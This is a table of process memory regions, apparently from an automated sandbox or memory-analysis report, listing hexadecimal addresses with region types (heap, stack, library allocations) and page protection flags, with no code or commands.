2C19000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
623000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
582E000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1676000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1BC05000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
592F000
|
stack
|
page read and write
|
||
|
2B4D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
29CE000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
19A98700000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
19A984C6000
|
heap
|
page read and write
|
||
|
AC8000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
194E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
2FBD000
|
stack
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
271F000
|
stack
|
page read and write
|
||
|
29A7000
|
trusted library allocation
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
41E0000
|
heap
|
page read and write
|
||
|
2E6F000
|
stack
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
19A9A3C1000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
332F000
|
stack
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
27E6000
|
trusted library allocation
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
33BC000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98430000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B6BE000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
292F000
|
stack
|
page read and write
|
||
|
239BBC60000
|
heap
|
page read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B936000
|
heap
|
page read and write
|
||
|
43BE000
|
stack
|
page read and write
|
||
|
2C18000
|
heap
|
page read and write
|
||
|
B36000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
13FF000
|
heap
|
page read and write
|
||
|
19A98C1A000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98A6F000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
63E000
|
stack
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
339B000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239D5E40000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2768000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
730000
|
unkown
|
page readonly
|
||
|
600000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
B12000
|
heap
|
page read and write
|
||
|
1B91E000
|
heap
|
page read and write
|
||
|
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
296A000
|
trusted library allocation
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
33B9000
|
heap
|
page read and write
|
||
|
24B0000
|
trusted library section
|
page read and write
|
||
|
2808000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2BE8000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2D7D000
|
stack
|
page read and write
|
||
|
1BBDA000
|
heap
|
page read and write
|
||
|
231F000
|
stack
|
page read and write
|
||
|
7FFD9B99C000
|
trusted library allocation
|
page read and write
|
||
|
2480000
|
trusted library section
|
page read and write
|
||
|
19A984C9000
|
heap
|
page read and write
|
||
|
27ED000
|
stack
|
page read and write
|
||
|
1BBC2000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
2E4F000
|
stack
|
page read and write
|
||
|
4F74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98C10000
|
heap
|
page read and write
|
||
|
1B865000
|
heap
|
page read and write
|
||
|
1AAED000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
19A984AE000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2D8D000
|
stack
|
page read and write
|
||
|
558F000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
4CE1000
|
heap
|
page read and write
|
||
|
3187000
|
heap
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
B2C000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
2D58000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2BCE000
|
stack
|
page read and write
|
||
|
B06000
|
heap
|
page read and write
|
||
|
5BEC000
|
stack
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
8FB000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
19A98462000
|
heap
|
page read and write
|
||
|
1B69F000
|
heap
|
page read and write
|
||
|
2C1A000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
B2B000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B705000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
B1B000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2A58000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
7FFD9BB25000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B710000
|
heap
|
page read and write
|
||
|
31EF000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
396E000
|
heap
|
page read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
3730000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9BB5C000
|
trusted library allocation
|
page read and write
|
||
|
44BE000
|
stack
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
19A98A64000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
B05000
|
heap
|
page read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
19A984AB000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B98F000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BBBB0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2040000
|
trusted library allocation
|
page read and write
|
||
|
4F9D000
|
stack
|
page read and write
|
||
|
2A3D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
8EE000
|
stack
|
page read and write
|
||
|
239BD56E000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A984B6000
|
heap
|
page read and write
|
||
|
A6E000
|
stack
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
279D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
276000
|
unkown
|
page readonly
|
||
|
2A8D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A9A3CE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98491000
|
heap
|
page read and write
|
||
|
3338000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
|
596E000
|
stack
|
page read and write
|
||
|
116D000
|
unkown
|
page execute read
|
||
|
19A9A3CE000
|
heap
|
page read and write
|
||
|
548E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9BB5A000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98493000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
714C000
|
stack
|
page read and write
|
||
|
19A98A5C000
|
heap
|
page read and write
|
||
|
2D1F000
|
stack
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
19A984C1000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98459000
|
heap
|
page read and write
|
||
|
3840000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1AF30000
|
trusted library section
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
2AD7000
|
stack
|
page read and write
|
||
|
19A984B5000
|
heap
|
page read and write
|
||
|
18BA000
|
unkown
|
page execute read
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
1B52E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98C1E000
|
heap
|
page read and write
|
||
|
4871000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
53BE000
|
stack
|
page read and write
|
||
|
32EE000
|
stack
|
page read and write
|
||
|
305F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C49000
|
heap
|
page read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
B0F000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
643000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
515E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
36DF000
|
stack
|
page read and write
|
||
|
6550000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
4B9E000
|
stack
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
BF2FFFE000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
BF2F9E3000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
738C1FF000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2AFA000
|
stack
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
BF300FC000
|
stack
|
page read and write
|
||
|
627000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
29DF000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2350000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page execute read
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2656000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B4C000
|
heap
|
page read and write
|
||
|
19A98C17000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2A7F000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BD56C000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
276D000
|
stack
|
page read and write
|
||
|
301E000
|
stack
|
page read and write
|
||
|
19A98A81000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9B9C3000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B423000
|
stack
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B6CE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2340000
|
trusted library section
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
26FB000
|
trusted library allocation
|
page read and write
|
||
|
65E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98491000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C40000
|
heap
|
page read and write
|
||
|
46AE000
|
stack
|
page read and write
|
||
|
B16000
|
heap
|
page read and write
|
||
|
CBF000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
19A98400000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
19A983C0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A984C0000
|
heap
|
page read and write
|
||
|
2C9F000
|
heap
|
page read and write
|
||
|
239BD548000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2C47000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B6B1000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B2C000
|
heap
|
page read and write
|
||
|
13DE000
|
heap
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
2C1E000
|
heap
|
page read and write
|
||
|
B09000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19B000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A982E0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B2C000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B2E000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
32FF000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B24000
|
heap
|
page read and write
|
||
|
BF302FE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
318E000
|
heap
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
BF30D76000
|
stack
|
page read and write
|
||
|
19A984C8000
|
heap
|
page read and write
|
||
|
2ACD000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
13D9000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B0E000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
2A3D000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3B6000
|
stack
|
page read and write
|
||
|
19A98C17000
|
heap
|
page read and write
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
269E000
|
trusted library allocation
|
page read and write
|
||
|
3391000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3397000
|
heap
|
page read and write
|
||
|
1B902000
|
heap
|
page read and write
|
||
|
1B830000
|
heap
|
page read and write
|
||
|
19A98A84000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
27DA000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3966000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2F8A000
|
trusted library allocation
|
page read and write
|
||
|
4C9F000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C9F000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2D5E000
|
stack
|
page read and write
|
||
|
AB0000
|
heap
|
page execute and read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
54BF000
|
stack
|
page read and write
|
||
|
1B8F3000
|
heap
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98492000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98A7D000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
1950000
|
heap
|
page read and write
|
||
|
B25000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BD5D0000
|
trusted library allocation
|
page read and write
|
||
|
1B020000
|
heap
|
page read and write
|
||
|
1B667000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B689000
|
heap
|
page read and write
|
||
|
27E0000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A984C1000
|
heap
|
page read and write
|
||
|
B13000
|
heap
|
page read and write
|
||
|
433000
|
unkown
|
page execute read
|
||
|
19A98705000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
56CD000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
40000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
511F000
|
stack
|
page read and write
|
||
|
1B6EC000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
67E000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
1B67000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9B9C7000
|
trusted library allocation
|
page read and write
|
||
|
1F0E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1BBA5000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C48000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2DDD000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B8AF000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A9A3C2000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
40000
|
unkown
|
page readonly
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98C1A000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
19A98A7B000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3397000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
1B84D000
|
heap
|
page read and write
|
||
|
4D80000
|
heap
|
page read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
19A98C1B000
|
heap
|
page read and write
|
||
|
239BBC30000
|
trusted library allocation
|
page read and write
|
||
|
1B22E000
|
stack
|
page read and write
|
||
|
BF3033E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
2A7D000
|
stack
|
page read and write
|
||
|
4CEE000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
1B92B000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
27AC000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B52000
|
heap
|
page read and write
|
||
|
67D000
|
stack
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B29000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1900000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98A81000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
567E000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
239BBD15000
|
heap
|
page read and write
|
||
|
2DB8000
|
heap
|
page read and write
|
||
|
2FDF000
|
stack
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
66F000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
116D000
|
unkown
|
page execute read
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
1BBF1000
|
heap
|
page read and write
|
||
|
19A984BB000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B6DE000
|
heap
|
page read and write
|
||
|
292D000
|
stack
|
page read and write
|
||
|
C3A000
|
stack
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BBD10000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
303D000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2AC6000
|
stack
|
page read and write
|
||
|
264A000
|
trusted library allocation
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239D5E8B000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
4E97000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B67000
|
unkown
|
page readonly
|
||
|
1B853000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
27A8000
|
trusted library allocation
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
B06000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
44FE000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1C41C000
|
stack
|
page read and write
|
||
|
